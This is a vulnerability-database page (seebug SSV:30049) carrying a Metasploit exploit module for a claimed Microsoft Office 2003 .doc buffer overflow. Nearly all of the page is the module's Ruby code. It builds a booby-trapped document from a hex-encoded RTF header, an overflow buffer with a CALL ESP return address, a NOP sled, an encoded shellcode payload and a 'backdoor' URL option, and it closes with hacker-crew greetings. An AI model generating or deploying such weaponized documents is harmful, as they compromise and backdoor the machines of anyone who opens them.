Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
seebugRootSSV:30049
HistoryJan 26, 2012 - 12:00 a.m.

Microsoft Office 2003 .doc Buffer Overflow

2012-01-2600:00:00
Root
www.seebug.org
16
JSON

No description provided by source.


                                                ###
# Title : Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)
# Author : KedAns-Dz
# E-mail : [email protected] ([email protected]) | [email protected] | [email protected]
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com
# Facebook : http://facebook.com/KedAns 
# platform : windows ( local BOF via MSF)
# Type : local exploit / Buffer Overflow / Metasploit
###

##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE  .. |
# | ------------------------------------------------- < |
###

##
# $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
     Rank = GoodRanking

    include Msf::Exploit::FILEFORMAT

    def initialize(info = {})
        super(update_info(info,
           'Name'     => 'Microsoft Office 2003 (.doc) Command Exec and local BOF',
           'Description' => %q{
             This module exploits a buffer overflow in Microsoft Office 2003
             and Command Exec With .doc file .
      },
           'License'        => MSF_LICENSE,
           'Author'         =>
              [
               'b33f',
               'g11tch',
               'KedAns-Dz <ked-h[at]hotmail.com>' # MSF module
              ],
           'Version'        => '1.0',
           'References'     =>
               [
              [ 'URL', 'http://exploit-db/exploits/18334' ],
               ],
           'DefaultOptions' =>
               {
                'EXITFUNC' => 'process',
               },
           'Payload'        =>
                {
                'Space'      => 1024,
                'BadChars'    => "'",
                'EncoderType'  => Msf::Encoder::Type::AlphanumMixed,
                'EncoderOptions' =>
                   {
                    'BufferRegister' => 'ESI',
                   }
                },
           'Platform'       => 'win',
           'Targets'        =>
               [
             [ 'Microsoft Office 2003 - MSWord (.doc Heap Spray)', { 'Ret' => '' } ],
               ],
            'DisclosureDate' => 'JAN 08 2012',
            'DefaultTarget'  => 0))

        register_options(
           [
            OptString.new('FILENAME', [ true, 'The file name.',  'msf.doc']),
            OptString.new('URLBD', [ true, 'URL From the Backdoor.',  'http://']),
           ], self.class)
    end

    def exploit
        # Encode the url.
        url = Rex::Text.to_unescape(datastore['URLBD'])
    
    # Header File
   file =
   "\x7b\x5c\x72\x74\x23\x23\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70"+
   "\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73"+
   "\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a"+
   "\x5c\x73\x68\x70\x69\x6e\x73\x74\x5c\x73\x68\x70\x66\x68\x64\x72"+
   "\x30\x5c\x73\x68\x70\x62\x78\x63\x6f\x6c\x75\x6d\x6e\x5c\x73\x68"+
   "\x70\x62\x79\x70\x61\x72\x61\x5c\x73\x68\x20\x70\x77\x72\x32\x7d"+
   "\x7b\x5c\x73\x70\x7b\x5c\x73\x6e\x20\x7b\x7d\x7b\x7d\x7b\x5c\x73"+
   "\x6e\x7d\x7b\x5c\x73\x6e\x7d\x7b\x5c\x2a\x5c\x2a\x7d\x70\x46\x72"+
   "\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
   "\x7b\x5c\x73\x76\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
   "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x52"+
   "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
   "\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x39\x3b\x32\x3b\x66\x66"+
   "\x66\x66\x66\x66\x66\x66\x66\x66"
    # Buffer Overflow 
      buf = "\x23" * 501
       buf << "\x30\x35"
       buf << "\x30" * 40
       buf << "\x36\x36\x34\x33\x33\x32\x33\x30" # CALL ESP - WINWORD.exe
       buf << "\x30\x30\x30\x30\x38\x30\x37\x63" * 2
       buf << rand_text_alpha(42)
       buf << "\x39\x30" * 18
       buf << payload.encoded
    
      # Create the doc
        doc = file
        doc << buf
        doc << url
        doc << "\x00"
        doc << "{}}}}}}"
        doc << "\x0d\x0a"
        doc << "}"

    print_status("Creating '#{datastore['FILENAME']}' file...")

    file_create(doc)
  end

end

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > || Rizky Ariestiyansyah * Islam Caddy 
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * Kalashinkov3 * SeeMe * ZoRLu * anT!-Tr0J4n
# Anjel Injection (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * KinG Of PiraTeS * www.packetstormsecurity.org * TreX
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================
JSON